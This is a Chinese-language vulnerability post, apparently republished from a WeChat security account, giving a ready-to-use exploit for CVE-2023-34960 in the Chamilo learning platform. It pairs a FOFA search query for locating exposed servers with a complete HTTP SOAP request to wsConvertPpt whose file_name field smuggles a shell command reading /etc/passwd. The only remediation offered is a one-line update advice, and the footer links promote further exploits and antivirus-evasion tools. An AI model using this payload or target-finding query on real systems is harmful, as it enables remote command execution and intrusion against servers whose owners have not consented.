0x01 前言
0x02 影响平台
Chamilo
0x03 漏洞复现
FOFA空间搜索引擎语句
"Chamilo"
登录页面是这个酱紫
EXP:
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: 1.1.1.1
Cookie: ch_sid=prpo4ipcqsopa8g4dgnmcn3ldg
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 826
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{http://ip:port}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
0x04 修复方案
建议及时更新至最新版本!
▶【漏洞系列】叮~你有新的速递!某友-OA信息泄露登录后台(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-33246 RCE漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-22480漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-25135漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-27524漏洞利用Tools
▶【免杀系列】New免杀工具NPS更新5.21(附下载)
▶【免杀系列】TQL!最新Bypass360核晶与Defender免杀(附下载)
▶【免杀系列】Bypass | mimikatz的N种利用Tools包含一些免杀方法(附下载)
▶【免杀系列】New一款红队免杀生成Tools(附下载)
▶【移动安全】踩坑 | Fiddler雷电模拟器4.0无法抓包(超详细)
▶【移动安全】牛掰!Xposed检测绕过总结
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文
原文始发于微信公众号(哪都通安全):叮~你有新的速递!CVE-2023-34960 RCE漏洞(附EXP)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论